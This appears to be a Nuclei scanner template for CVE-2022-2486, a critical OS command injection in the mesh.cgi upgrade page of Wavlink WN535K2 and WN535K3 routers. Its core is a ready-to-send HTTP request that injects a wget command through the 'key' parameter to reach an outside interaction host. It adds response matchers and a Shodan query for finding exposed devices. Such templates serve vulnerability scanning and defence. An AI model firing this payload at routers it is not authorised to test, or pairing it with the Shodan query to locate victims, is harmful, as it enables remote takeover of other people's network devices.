id: CVE-2022-2486

info:
  name: Wavlink Mesh.cgi - Remote Code Execution
  author: For3stCo1d
  severity: critical
  description: |
    A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
  reference:
    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486
    - https://vuldb.com/?id.204537
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-2486
    cwe-id: CWE-78
  metadata:
    shodan-query: http.title:"Wi-Fi APP Login"
    verified: "true"
  tags: cve,cve2022,iot,wavlink,router,rce,oast

requests:
  - raw:
      - |
        GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"

      - type: status
        status:
          - 500